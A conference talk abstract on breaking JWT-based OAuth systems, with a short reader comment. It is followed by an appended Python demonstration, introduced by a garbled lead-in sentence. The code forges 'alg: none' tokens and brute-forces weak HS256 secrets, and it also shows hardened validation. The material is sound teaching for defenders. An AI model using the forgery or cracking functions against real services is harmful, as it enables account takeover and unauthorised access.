So you’ve finally secured your APIs, and they use JWTs because everyone else does. But are they secure? JWTs are the new big thing that everyone is talking about, but you need to use them correctly. In this talk we will see how various attacks can be used to break into OAuth systems that use JWTs as their token mechanism. From token validation flaws to brute-forcing HS256 secrets, by taking the attacker’s point of view attendees will learn how to better defend themselves and build more secure servers.

Comments


Eric Mann at 14:07 on 26 Aug 2019

My only concern would be the relative ease of the "brute force an HS256 signature" demonstration. It does show how a weak key can be broken, but in practice even "weak" keys are somewhat stronger and would require a more focused approach to brute forcing.
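The two attacks the abstract names, a token-validation flaw (accepting `alg: none`) and brute-forcing an HS256 secret, and the weak-versus-strong-key point raised in the comment above, as an added example that is not part of the talk or the original page. It uses only the Python standard library; the wordlist, the short-key search space, the hypothetical function names, and the sample tokens are all constructed for this illustration.

```python
import base64
import hashlib
import hmac
import itertools
import json
import secrets
import string
from typing import Iterable, Optional


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Mint a compact HS256 JWT the way a typical server would."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def forge_alg_none(payload: dict) -> str:
    """Attacker token: alg=none and an empty signature. A validator that
    trusts the header's alg field will accept this without any key."""
    header = {"alg": "none", "typ": "JWT"}
    return (b64url(json.dumps(header, separators=(",", ":")).encode())
            + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()) + ".")


def brute_force_hs256(token: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline attack: recompute the HMAC over the token's own signing input
    for each candidate secret. Only the token is needed, not the server."""
    signing_input, _, sig_b64 = token.rpartition(".")
    target = b64url_decode(sig_b64)
    for cand in candidates:
        mac = hmac.new(cand, signing_input.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return cand
    return None


# Constructed wordlist and exhaustive short-key space (assumptions for the demo).
WEAK_WORDLIST = [b"secret", b"password", b"123456", b"changeme", b"jwt"]


def short_keys(max_len: int) -> Iterable[bytes]:
    """All lowercase-letter secrets up to max_len characters (26 + 676 + 17576 for 3)."""
    for n in range(1, max_len + 1):
        for chars in itertools.product(string.ascii_lowercase, repeat=n):
            yield "".join(chars).encode()


def verify_hs256(token: str, secret: bytes, allowed_algs=("HS256",)) -> dict:
    """Hardened validation: pin the algorithm server-side before touching the
    signature, then compare HMACs in constant time."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header = json.loads(b64url_decode(parts[0]))
    if header.get("alg") not in allowed_algs:          # blocks alg=none and alg confusion
        raise ValueError("algorithm not allowed")
    expected = hmac.new(secret, (parts[0] + "." + parts[1]).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(parts[2])):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(parts[1]))


def demo() -> dict:
    """Weak secret falls to the wordlist; a 256-bit random secret does not."""
    weak_tok = sign_hs256({"sub": "alice", "admin": False}, b"secret")
    strong_tok = sign_hs256({"sub": "alice", "admin": False}, secrets.token_bytes(32))
    search_space = list(WEAK_WORDLIST) + list(short_keys(3))
    try:
        verify_hs256(forge_alg_none({"sub": "alice", "admin": True}), b"secret")
        none_rejected = False
    except ValueError:
        none_rejected = True
    return {
        "weak_recovered": brute_force_hs256(weak_tok, search_space),
        "strong_recovered": brute_force_hs256(strong_tok, search_space),
        "none_rejected": none_rejected,
    }


if __name__ == "__main__":
    print(demo())
```

The brute force is entirely offline, which is why key strength rather than rate limiting is the defence: a random 256-bit secret (the size HS256 should use) is out of reach of any wordlist or exhaustive search, while a human-chosen secret of a few characters is recovered in well under a second here.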